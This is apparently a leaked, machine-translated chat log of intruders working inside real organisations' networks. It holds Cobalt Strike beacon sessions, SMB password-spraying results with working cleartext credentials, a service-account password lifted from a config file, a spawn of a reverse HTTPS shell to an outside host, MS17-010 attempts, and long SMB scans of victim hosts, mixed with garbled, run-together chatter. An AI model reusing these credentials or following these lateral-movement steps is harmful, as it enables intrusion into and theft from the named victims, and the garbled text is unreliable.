but in general you're right and it's more serviceable can SharpSpray run with this password?))nsupport ;))alas(``
[-] 10.100.1.101:445 - 10.100.1.101:445 - Failed: 'orange_fact\Svc_ADSync:Sync!T4u',
Try that one tooSvc_ADSync might work because it's a service account
see if there are other users in the domain with the Svc_ prefix.
because the name of the account ends with the phrase from the passwordIn fact, you can just do smb_login to check if someone from the domain admin has such a password. what is the profit of autobrouting here?
```
[-] 10.113.1.126:445 - 10.113.1.126:445 - Failed: 'orange_fact\Svc_CRMailSync:Sync!T4u',
``Try smb_autobrute on this pass, it turns out it has no LA rights anywhere, right? I guess this Svc_CRMMailSync doesn't have a wheelbarrow.

beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 231 bytes
[+] received output:
vpinc.net
beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
orange_fact\color764

``aahhhh, that's what I told him without the domain.)
it's just that their domain is vpinc.net
and whoami shows the other one, what did you check it with by the way?
Credentials
===========

host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
10.100.1.29 10.100.1.63 445/tcp (smb) Svc_CRMailSync Sync!T4u Password
10.100.1.63 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.100.1.79 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.100.1.101 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.100.5.2 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.100.5.3 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.101.1.2 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.102.1.2 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.104.1.11 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.105.1.2 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.106.1.8 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.109.1.21 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.110.1.2 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.113.1.2 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.250.1.41 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
why would he have the correct username/password? You'll still get it checked at LA with domain?
orange_fact\Svc_CRMailSync:Sync!T4u
How do you run it? Almost all the hosts have been through, but none with "admin" tagged on them. Any success?
Global Group memberships *Domain Users
``Let's see what groups he's in,`` net user Svc_CRMailSync /domoo
great``.
[+] 10.100.1.63:445 - 10.100.1.63:445 - Success: 'orange_fact\Svc_CRMMailSync:Sync!T4u'

``Are there any kerbs from here?
Check to see if the pass is valid?
dn:CN=Svc_CRMMailSync,OU=Orange City,OU=Service Accounts,DC=vpinc,DC=net
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: Svc_CRMailSync
>description: Service Account for CRM Mail Sync in O365
>givenName: Svc_CRMMailSync
``````
 <add key="impersonationUserName" value="Svc_CRMMailSync@vpinc.net" />
    <add key="impersonationPassword" value="Sync!T4u" />
``:thumbsup:from what - it's not clear hashes are there```.
\\10.100.1.89\ldlogon\LDHashDir
``````
LicenceNumber: 1AF8-140128-081558
Serial Number: 1AF8-0004B3-28D9DE3B
``Then go through the ones that are available - crawl with your hands, look for pvsh bat scripts of all kindsvot full
in the past highlighted interesting and already scanned everything? so few cars? as well as c$admin$ there is nowhere except his output yes?
shell SharpShares.exe shares > shares.txt
``Works check in lab, i don't chekalon through shell windows won't open any? and stop if dropped? i think not(but through `>> won't work? alas no SharpShares output to a file?
beacon> shell net accounts /dom
[*] Tasked beacon to run: net accounts /dom
[+] host called home, sent: 48 bytes
[+] received output:
The request will be processed at a domain controller for domain MandKLaw.com.

System error 5 has occurred.

Access is denied.

``We must have blocked it...
```
beacon> shell net user panderson /dom
[*] Tasked beacon to run: net user panderson /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain MandKLaw.com.

System error 5 has occurred.

Access is denied.

``I'll start it.'' And SharpShares? on a working session just killed it just did not work - hangs with what error? crashes process did you run it online? + cleartext creed no under skul and 17-010 yesterday tried
that's it, it's gone.
farm is still off?[*] tasked beacon to spawn (x86) windows/foreign/reverse_https (slypad.com:443:443) passnulnet, 15 hoursftp exploits here is not the best solution and hardly a working session? found ldap and pointed it in the batken how to do?) me in the chat there is not a nickname)(@user9 here in bellymore who will stay here?there's one left for work, i'm still digging around at least have you cleaned the bash behind you? there's one lin with ssh access, but nothing good to come out of there either, no way to move forward so far, no way to do anything here?
172.16.63.21
172.16.50.13
172.16.55.49
172.16.59.203
172.16.60.210
172.16.61.44
172.16.61.150
172.16.61.178
172.16.61.179
172.16.64.151
172.16.65.88
172.16.66.162
172.16.66.247
172.16.68.102
172.16.68.169
172.16.68.196
172.16.69.212
172.16.100.79
172.16.100.133
172.16.200.19
172.16.200.21
172.16.200.22
172.16.200.24
172.16.200.39
172.16.200.46
172.16.200.49
172.16.200.50
172.16.200.55
172.16.200.56
172.16.200.59
172.16.200.60
172.16.200.67
172.16.200.74
172.16.200.79
172.16.200.100
172.16.200.101
172.16.200.103
172.16.200.111
172.16.200.114
172.16.200.122
172.16.200.123
172.16.200.128
172.16.200.129
172.16.200.130
172.16.200.132
172.16.200.133
172.16.200.139
172.16.200.140
172.16.200.147
172.16.200.149
172.16.200.157
172.16.200.162
172.16.200.164
172.16.200.165
172.16.200.166
172.16.200.167
172.16.200.170
172.16.200.172
172.16.200.174
172.16.200.183
172.16.200.184
172.16.200.185
172.16.200.188
172.16.200.189
172.16.200.191
172.16.200.192
172.16.200.194
172.16.200.201
172.16.200.203
172.16.200.206
172.16.200.210
172.16.200.214
``````

[+] 172.16.200.24:445 - 172.16.200.24:445 - Success: 'snu\alangvardt:Crimson24!
[+] 172.16.200.59:445 - 172.16.200.59:445 - Success: 'snu\alangvardt:Crimson24!
[+] 172.16.200.55:445 - 172.16.200.55:445 - Success: 'snu\alangvardt:Crimson24!
[+] 172.16.200.50:445 - 172.16.200.50:445 - Success: 'snu\alangvardt:Crimson24!
``private part of the nixam 600 + ips was rasskandy already understood the old session is outkst if you do not know, logging in under the account of two at the same time can not go there I did not go, I can not tell you and most likely logging in under vpn[ ] (https://mediaeveryone.com/group/snu-edu?msg=usQ55fv2NeQYzKhZC) I even hz where you login) ie here ok? I have doubts) and what's the difference
they just have some function apparentlya it staffkirase 3-4 sawhere should beZEWS there morewas met already) are used by some software that works as AD factories))))there are names servookvig saw more tanos in what the scanner, loki ``
[+] 172.16.200.67:445 - Host is running Windows 10 Education (build:18363) (name:THOR) (domain:AD)
[*] 172.16.200.100:445 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.16.200.100:445 - Host could not be identified: OS400 V5R4M0 (iSeries Support for Windows Network Neighborhood)
[*] 172.16.200.74:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{8812df22-8cb9-43ac-b0c3-2a9815aac072} (authentication domain:AD)
[+] 172.16.200.74:445 - Host is running Windows 10 Education (build:19041) (name:LOKI) (domain:AD)
Why all of a sudden? @tl2 isn't it a juice or testlab? so you can import it yourself and I'll send you more info from AIS so you can work with it by hand but there's no tpsh) yeah I didn't go thereconmille the same thing but you can check other versions yourself there 2003 x2 I poked there with standard msf ms17 and python from git, both bypassed `` ``
[*] 172.16.55.49:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5d 5h 9m 34s) (guid:{7c383e10-996e-472a-b2aa-1e72646b4596}) (authentication domain:AD)
[+] 172.16.55.49:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:TRACS) (authentication domain:AD)
[*] 172.16.59.203:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{ce97f21a-cd6b-417d-ad36-abafcb01b5f7} (authentication domain:AD)
[*] 172.16.61.150:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{1022c256-f8a7-43ea-43ea-bb83-d62c4131cf2a}) (authentication domain:AD)
[+] 172.16.61.150:445 - Host is running Windows 10 Education (build:19042) (name:MNT-12514) (domain:AD)
[*] 172.16.61.44:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{19c87015-5ea6-4695-b77b-85b63da84f3f}) (authentication domain:AD)
[*] 172.16.60.210:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{302495d4-e3f6-4b27-8f0d-11fb7461aade}) (authentication domain:AD)
[*] 172.16.61.178:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{08a5a5a814-d91b-4946-805a-0e425bffdcb8}) (authentication domain:AD)
[+] 172.16.61.178:445 - Host is running Windows 10 Education (build:19042) (name:LRC-14419) (domain:AD)
[*] 172.16.61.179:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{c83ae93f-d1dd-4696-8381-deb1c79cdbd4}) (authentication domain:AD)
[*] 172.16.63.21:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{a64a8a8d-c473-40ad-b107-4af9d32216e7}) (authentication domain:AD)
[*] 172.16.64.151:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 2d 23h 45m 23s) (guid:{f80450d7-cbcf-41f8-9c21-3bda38a5c579}) (authentication domain:AD)
[+] 172.16.64.151:445 - Host is running Windows 8.1 Enterprise (build:9600) (name:LRC-MCNA-13566) (domain:AD)
[*] 172.16.66.247:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{aa361949-4423-4d0a-99c3-950aeeb714e5} (authentication domain:AD)
[*] 172.16.68.102:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{cfcbdaf9-daf5-4f46-85c4-5c730200d569}) (authentication domain:AD)
[*] 172.16.68.169:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{16c0335d-9b75-47d1-82eb-2092a5a0500e}) (authentication domain:AD)
[*] 172.16.68.196:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{eccd62c2-f977-4bd1-9e7d-dc0b2204d738}) (authentication domain:AD)
[+] 172.16.68.196:445 - Host is running Windows 10 Education (build:19042) (name:LRC-14417) (domain:AD)
[*] 172.16.69.212:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{127b1da6-d6be-49cb-ac45-f25b4d9ddee7}) (authentication domain:AD)
[*] 172.16.100.79:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[+] 172.16.100.79:445 - Host is running Windows 2003 (build:3790) (name:CALLPILOT) (workgroup:WORKGROUP)
[*] 172.16.100.133:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4w 4d 18h 38m 3s) (guid:{eb2f1d4e-2ebb-44d1-9fe2-1425f91aa2c0} (authentication domain:AD)
[+] 172.16.100.133:445 - Host is running Windows 2016 Datacenter (build:14393) (name:NOVA) (domain:AD)
[*] 172.16.200.19:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[+] 172.16.200.19:445 - Host is running Windows 2003 SP2 (build:3790) (name:TMA) (workgroup:IT)
[*] 172.16.200.21:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 3d 5h 41m 15s) (guid:{a88f1f08-39da-4f86-8fbe-9711835eebde}) (authentication domain:AD)
[+] 172.16.200.21:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RE) (domain:AD)
[*] 172.16.200.22:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4w 2d 9h 58m 53s) (guid:{3bef3cb5-3c8c-4df1-8e46-eea0f465c181}) (authentication domain:AD)
[+] 172.16.200.22:445 - Host is running Windows 2016 Datacenter (build:14393) (name:RUDY) (domain:AD)
[*] 172.16.200.24:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:3d 0h 25m 11s) (guid:{16793b91-1bf3-416b-af2e-bd1fee48ac07}) (authentication domain:AD)
[+] 172.16.200.24:445 - Host is running Windows 2016 Datacenter (build:14393) (name:ATLANTIS) (domain:AD)
[*] 172.16.200.39:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:36w 1d 22h 23m 15s) (guid:{6e43de8c-8f97-4442-b757-ddbb9d3807a2) (authentication domain:AD)
[+] 172.16.200.39:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:LISTSERV) (authentication domain:AD)
[*] 172.16.200.46:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5d 5h 32m 6s) (guid:{7c383e10-996e-472a-b2aa-1e72646b4596}) (authentication domain:AD)
[+] 172.16.200.46:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:TRACS) (authentication domain:AD)
[*] 172.16.200.49:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4d 4h 53m 51s) (guid:{8de2b5f8-04f3-4ee5-8539-77b6c1fa8942}) (authentication domain:AD)
[+] 172.16.200.49:445 - Host is running Windows 2016 Datacenter (build:14393) (name:ZUUL) (domain:AD)
[*] 172.16.200.50:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:11w 4d 21h 41m 40s) (guid:{879cd9e0-1172-49d5-842d-2added5b8621}) (authentication domain:AD)
[+] 172.16.200.50:445 - Host is running Windows 2016 Datacenter (build:14393) (name:THANOS) (domain:AD)
[*] 172.16.200.55:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:3d 0h 26m 33s) (guid:{16793b91-1bf3-416b-af2e-bd1fee48ac07}) (authentication domain:AD)
[+] 172.16.200.55:445 - Host is running Windows 2016 Datacenter (build:14393) (name:ATLANTIS) (domain:AD)
[*] 172.16.200.56:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 172.16.200.56:445 - Host could not be identified: Unix (Samba 3.0.10)
[*] 172.16.200.60:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{68637261-7669-7365-0000-000000000000) (authentication domain:AD)
[*] 172.16.200.59:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (guid:{696c6f67-7461-0068-0000000000000000}) (authentication domain:AD)
[*] 172.16.200.59:445 - Host could not be identified: QTS (Samba 4.0.25)
[*] 172.16.200.67:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{daa76305-ec4c-4d2d-b99d-748ea91132f3} (authentication domain:AD)
[+] 172.16.200.67:445 - Host is running Windows 10 Education (build:18363) (name:THOR) (domain:AD)
[*] 172.16.200.100:445 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.16.200.100:445 - Host could not be identified: OS400 V5R4M0 (iSeries Support for Windows Network Neighborhood)
[*] 172.16.200.74:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{8812df22-8cb9-43ac-b0c3-2a9815aac072} (authentication domain:AD)
[+] 172.16.200.74:445 - Host is running Windows 10 Education (build:19041) (name:LOKI) (domain:AD)
[*] 172.16.200.101:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:52w 4d 6h 8m 15s) (guid:{ffe9db1f-c2b1-4433-8286-bb0c50be8973}) (authentication domain:AD)
[+] 172.16.200.101:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:NVR2) (authentication domain:AD)
[*] 172.16.200.79:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4d 4h 49m 53s) (guid:{8768f9fd-5b33-4161-bc41-df381fb91dea}) (authentication domain:AD)
[+] 172.16.200.79:445 - Host is running Windows 2016 Datacenter (build:14393) (name:NILES) (domain:AD)
[*] 172.16.200.103:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:15h 18m 30s) (guid:{f7a0fe69-c8c0-4c2e-91b8-2f8206eeb4d1}) (authentication domain:AD)
[+] 172.16.200.103:445 - Host is running Windows 2016 Datacenter (build:14393) (name:CASTOR) (domain:AD)
[*] 172.16.200.111:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:52w 4d 6h 4m 27s) (guid:{5fa9f132-da1d-4da5-959d-30a163e4a96e}) (authentication domain:AD)
[+] 172.16.200.111:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:ATLANTIS-OLD) (authentication domain:AD)
[*] 172.16.200.114:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:41w 5d 20h 16m 2s) (guid:{c997f858-6336-4daf-8a72-42a0c336c8e7}) (authentication domain:AD)
[+] 172.16.200.114:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:SOTER) (domain:AD)
[*] 172.16.200.123:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:52w 5d 4h 58m 9s) (guid:{b97c73ad-034b-4542-bb1c-8d5469345961}) (authentication domain:AD)
[+] 172.16.200.123:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:NETSIGHT) (authentication domain:AD)
[*] 172.16.200.128:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:21w 5d 22h 58m 41s) (guid:{ef0f8052-96a4-4118-a393-f97ef8e04381}) (authentication domain:AD)
[+] 172.16.200.128:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-COLL-APP) (authentication domain:AD)
[*] 172.16.200.122:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:4w 5d 22h 0m 2s) (guid:{242103e3-c92f-474d-95de-b2a20178aaa7}) (authentication domain:AD)
[+] 172.16.200.122:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:SHIELD) (authentication domain:AD)
[*] 172.16.200.129:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:27w 0d 19h 40m 23s) (guid:{9c9f440c-97d1-4cf8-bdcf-003e91fded92}) (authentication domain:AD)
[+] 172.16.200.129:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-COLL-TEST) (domain:AD)
[*] 172.16.200.130:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 4d 5h 45m 36s) (guid:{4e0c19a4-4078-46f8-b492-26b3d3dcc692}) (authentication domain:AD)
[+] 172.16.200.130:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-WEBUI-PROD) (domain:AD)
[*] 172.16.200.132:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 5d 5h 47m 28s) (guid:{08335653-32dd-4c54-831a-735e7725f87e}) (authentication domain:AD)
[+] 172.16.200.132:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-COLL-APPDB) (authentication domain:AD)
[*] 172.16.200.133:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 5d 6h 12m 59s) (guid:{e6da55ec-260c-4d42-bf98-91d4d47b6d71}) (authentication domain:AD)
[+] 172.16.200.133:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-COLL-TESTDB) (authentication domain:AD)
[*] 172.16.200.139:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 5d 5h 46m 44s) (guid:{ebb407e8-d089-40c7-87a3-4dbf11b58c18}) (authentication domain:AD)
[+] 172.16.200.139:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-DROA-DB) (authentication domain:AD)
[*] 172.16.200.140:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:14w 5d 19h 52m 3s) (guid:{5d2ad53d-09fe-4fb8-8e9b-48dc8396f1c1}) (authentication domain:AD)
[+] 172.16.200.140:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-DROA-APP) (authentication domain:AD)
[*] 172.16.200.147:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:25w 5d 0h 54m 31s) (guid:{cee00f93-7579-40f0-8a43-677a91c17e71}) (authentication domain:AD)
[+] 172.16.200.147:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-UI-TEST) (domain:AD)
[*] 172.16.200.149:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 5d 6h 16m 48s) (guid:{c46e64fa-d123-4ff9-8fe6-217855cd2163}) (authentication domain:AD)
[+] 172.16.200.149:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-WEBAD-TEST) (domain:AD)
[*] 172.16.200.157:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 5d 5h 48m 20s) (guid:{512a6ea3-c927-4cf7-8fe3-947edc01fbb8}) (authentication domain:AD)
[+] 172.16.200.157:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EZPAY) (authentication domain:AD)
[*] 172.16.200.162:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 16h 36m 17s) (guid:{a0c16382-7c20-4c2a-aaf9-722c0a9aac21}) (authentication domain:AD)
[+] 172.16.200.162:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-SS-TEST) (authentication domain:AD)
[*] 172.16.200.164:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5d 19h 36m 28s) (guid:{b069c426-2917-46b2-9848-17f5b4f2ae3f) (authentication domain:AD)
[+] 172.16.200.164:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:IN-LF-1) (authentication domain:AD)
[*] 172.16.200.165:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:12w 6d 21h 11m 55s) (guid:{8b51e9d5-c4f3-468d-9016-ac868929551c}) (authentication domain:AD)
[+] 172.16.200.165:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:IN-LF-2) (authentication domain:AD)
[*] 172.16.200.166:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5w 3d 0h 11m 21s) (guid:{8d1b2b4e-fa50-48c5-bebd-612a00c9ca68}) (authentication domain:AD)
[+] 172.16.200.166:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:IN-LF-3) (authentication domain:AD)
[*] 172.16.200.167:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:4d 5h 56m 21s) (guid:{496b0655-8b75-408e-9fd8-ab6fae7860f6}) (authentication domain:AD)
[+] 172.16.200.167:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:IN-LF-DB) (authentication domain:AD)
[*] 172.16.200.170:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4d 4h 3m 42s) (guid:{db30dc9d-d540-40d1-8d69-8097486d7b52}) (authentication domain:AD)
[+] 172.16.200.170:445 - Host is running Windows 2016 Datacenter (build:14393) (name:LF-FORMS) (domain:AD)
[*] 172.16.200.172:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:5w 3d 2h 39m 0s) (guid:{c12b2df9-e1c6-4069-987b-dccc2a471647}) (authentication domain:AD)
[+] 172.16.200.172:445 - Host is running Windows 2016 Datacenter (build:14393) (name:YONDER) (domain:AD)
[*] 172.16.200.174:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4d 3h 48m 35s) (guid:{328035ff-a3cf-4af6-b6aa-15c8741b1954}) (authentication domain:AD)
[+] 172.16.200.174:445 - Host is running Windows 2016 Datacenter (build:14393) (name:CERBERUS) (domain:AD)
[*] 172.16.200.183:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5d 5h 54m 41s) (guid:{64e53680-fa39-43c8-8f8e-709f22e8dddd}) (authentication domain:AD)
[+] 172.16.200.183:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:SCANTRON-PS) (authentication domain:AD)
[*] 172.16.200.184:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4d 4h 48m 23s) (guid:{598b41e0-98da-4443-8b3a-50f68af69fe8}) (authentication domain:AD)
[+] 172.16.200.184:445 - Host is running Windows 2016 Datacenter (build:14393) (name:SCCM) (domain:AD)
[*] 172.16.200.185:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:5d 3h 57m 31s) (guid:{07b1d031-4dd2-4379-ad87-49bbec017527}) (authentication domain:AD)
[+] 172.16.200.185:445 - Host is running Windows 2016 Datacenter (build:14393) (name:TMS) (domain:AD)
[*] 172.16.200.188:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5w 2d 6h 16m 46s) (guid:{d7e060be-5b89-4fb2-aed1-447aa4efd919}) (authentication domain:AD)
[+] 172.16.200.188:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-APP) (domain:AD)
[*] 172.16.200.189:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:4d 6h 1m 56s) (guid:{4a5974d5-91df-4368-9e7c-fe3d5672650c}) (authentication domain:AD)
[+] 172.16.200.189:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-ASYNC) (authentication domain:AD)
[*] 172.16.200.191:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:12w 6d 17h 18m 49s) (guid:{d89d0ba7-60a3-4343-8014-cc2599518052}) (authentication domain:AD)
[+] 172.16.200.191:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-DB) (authentication domain:AD)
[*] 172.16.200.192:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5w 5d 17h 21m 14s) (guid:{de310876-e6e9-4c88-98f3-8115cd355a33}) (authentication domain:AD)
[+] 172.16.200.192:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-TESTAPP) (domain:AD)
[*] 172.16.200.194:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5d 5h 49m 33s) (guid:{9232b025-468c-4299-a42a-b3d907087a20}) (authentication domain:AD)
[+] 172.16.200.194:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-TESTDB) (domain:AD)
